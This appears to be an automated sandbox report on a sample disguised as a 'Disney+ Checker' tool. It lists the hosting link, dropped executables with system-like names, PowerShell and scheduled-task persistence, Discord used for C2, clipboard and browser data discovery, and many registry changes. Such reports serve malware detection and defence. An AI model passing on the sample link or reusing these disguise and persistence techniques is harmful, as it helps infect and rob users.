Analysis Overview
Threat Level: Likely malicious
The file https://gofile.io/d/NGsQfm was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Obfuscated with Agile.Net obfuscator
UPX packed file
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Modifies registry class
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-02 08:37
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-02 08:37
Reported
2024-09-02 08:45
Platform
win10v2004-20240802-en
Max time kernel
480s
Max time network
510s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\Disney+ Checker By PJ v1.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\System\FontDriverHost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Downloads" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "7" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "6" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2412658365-3084825385-3340777666-1000\{978630FF-3ECB-4D8C-AA9C-BE518C894DD9} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000000000001000000ffffffff | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = ffffffff | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\BackEndUpdates\FontDriverHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\disney+check\Disney+ Checker By PJ v1.1CP\Disney+ Checker By PJ v1.1\config\config\A1.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
